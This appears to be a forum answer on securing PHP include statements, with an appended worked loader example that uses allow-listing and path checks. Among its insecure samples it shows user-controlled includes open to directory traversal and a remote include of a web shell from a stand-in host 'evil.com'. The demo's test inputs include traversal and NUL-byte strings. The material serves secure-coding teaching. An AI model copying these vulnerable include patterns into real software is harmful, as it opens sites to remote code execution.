• May 17, 2018

    It all depends on how you implement it. If you specifically set the path, then it’s secure. The attack could happen if you allow user input to determine the file path without sanitization or checks.

    Insecure (Directory Traversal)

    <?php 
    include($_GET['file']);
    ?>

    Insecure (URL fopen – If enabled)

    <?php 
    include('http://evil.com/c99shell.php');
    ?>

    Insecure

    <?php 
    include('./some_dir/' . $_GET['file']);
    ?>

    Partially Insecure ( *.php files are vulnerable )

    <?php 
    include('./some_dir/' . $_GET['file'] . '.php');
    ?>

    Secure (Though not sure why anyone would do this.)

    <?php 
    $allowed = array(
        'somefile.php',
        'someotherfile.php'
    );
    
    if (in_array(basename($_GET['file']), $allowed)) {
        include('./includes/' . basename($_GET['file']));
    }
    ?>

    Secure

    <?php 
    include('./includes/somefile.php');
    ?>

    The best thing to do is ensure that the page you are trying to include exists first. The real security loopholes come when your include page is processed from some sort of user input, such as a URL variable. ?include=page.php As long as you are cautious of these you should be fine.

    <?php 
    // $file is assumed to have been built from validated input before this point
    if (is_file($file)) {
        // other code, such as user verification and such, should also go here
        include $file;
    }
    else { die(); }
    ?>
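As an added example (not code from the answer above), the following PHP loader combines the checks the answer recommends, an allow-list and an is_file() existence check, with a realpath() containment check, so that the requested name can only ever resolve to a regular file inside the includes directory. The function name resolve_include, the temporary directory layout and the sample request values are all constructed for this demo and are not part of the original post.

```php
<?php
// Added example, not from the original answer: a page loader that applies an
// allow-list, a realpath() containment check and an is_file() check before
// include. All names, paths and sample inputs below are constructed.

declare(strict_types=1);

/**
 * Return the absolute path of the page to include, or null when the request
 * must be refused. The caller decides how to respond to a refusal.
 */
function resolve_include(string $requested, string $baseDir, array $allowed): ?string
{
    // 1. Only a bare file name is acceptable: slashes, backslashes, NUL bytes
    //    and empty names never belong in a page parameter.
    if ($requested === '' || preg_match('/[\/\\\\\0]/', $requested)) {
        return null;
    }

    // 2. Allow-list with strict, exact matching (the answer's in_array check).
    if (!in_array($requested, $allowed, true)) {
        return null;
    }

    // 3. Resolve both sides and require the target to stay under $baseDir,
    //    which also catches symlinks pointing outside the directory.
    $base   = realpath($baseDir);
    $target = realpath($baseDir . DIRECTORY_SEPARATOR . $requested);
    if ($base === false || $target === false) {
        return null; // directory or file does not exist
    }
    if (strpos($target, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null; // resolved outside the includes directory
    }

    // 4. The answer's existence check: include regular files only.
    return is_file($target) ? $target : null;
}

// --- Demo with a constructed includes directory -----------------------------
$tmp = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'includes_demo_' . getmypid();
mkdir($tmp . '/includes', 0700, true);
file_put_contents($tmp . '/includes/somefile.php', "<?php echo \"somefile loaded\\n\";\n");
file_put_contents($tmp . '/includes/private.php',  "<?php echo \"should never load\\n\";\n");
file_put_contents($tmp . '/secret.txt', "outside the includes dir\n");

$allowed = ['somefile.php', 'someotherfile.php'];

// Constructed request values, as they might arrive in $_GET['file'].
$requests = [
    'somefile.php',                 // allowed and present: included
    'someotherfile.php',            // allowed but missing: refused
    'private.php',                  // present but not allow-listed: refused
    '../secret.txt',                // traversal attempt: refused
    "somefile.php\0.txt",           // NUL byte: refused
    'http://example.invalid/x.php', // remote URL: refused
];

foreach ($requests as $req) {
    $path = resolve_include($req, $tmp . '/includes', $allowed);
    printf("%-32s => %s\n", addcslashes($req, "\0"),
        $path === null ? 'refused' : 'include ' . basename($path));
    if ($path !== null) {
        include $path;
    }
}

// Remove the demo files again.
array_map('unlink', glob($tmp . '/includes/*'));
unlink($tmp . '/secret.txt');
rmdir($tmp . '/includes');
rmdir($tmp);
```

Only the first request is included; the other five are refused before include is reached. Refusing everything that is not a bare allow-listed file name, rather than trying to strip "../" or "http://" out of the input, is the design choice that keeps the loader simple to reason about.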
